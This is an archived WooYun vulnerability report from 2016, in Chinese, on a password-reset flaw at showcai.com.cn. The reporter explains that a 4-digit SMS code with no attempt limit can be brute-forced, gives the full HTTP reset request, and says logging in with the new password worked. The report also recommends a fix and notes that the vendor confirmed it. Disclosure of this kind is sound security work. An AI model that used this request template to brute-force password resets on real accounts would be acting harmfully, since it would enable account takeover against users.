乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-02: 细节已通知厂商并且等待厂商处理中 2016-01-04: 厂商已经确认,细节仅向厂商公开 2016-01-14: 细节向核心白帽子及相关领域专家公开 2016-01-24: 细节向普通白帽子公开 2016-02-03: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
新年快乐~
http://www.showcai.com.cn/dwzq_front/index/indexInfo
http://www.showcai.com.cn/dwzq_front/resetPassword/getPage?mobile=
输入手机号获取验证码 填上新密码后进行爆破 - -经测试确定验证码为4位数字..验证码到期时间足够爆破完了.而且对次数也没有限制
GET /dwzq_front/resetPassword/userResetPassword?mobile=手机号&authCode=验证码&password=新密码&_=1451643718331 HTTP/1.1Host: www.showcai.com.cnAccept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.69 Safari/537.36 QQBrowser/9.1.4060.400Referer: http://www.showcai.com.cn/dwzq_front/resetPassword/getPage?mobile=Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=E7462A4F931D752791CEEA0B8EC44B23; Hm_lvt_1ef4dcfc6a759a178be333c4c9d1f5e1=1451636785; Hm_lpvt_1ef4dcfc6a759a178be333c4c9d1f5e1=1451643719
ok拿新密码登录下试试. 成功登录~
加强验证码或者增加次数限制
危害等级:低
漏洞Rank:5
确认时间:2016-01-04 10:23
此为公司的另一站点,非官网,已联系相关人员处理。
暂无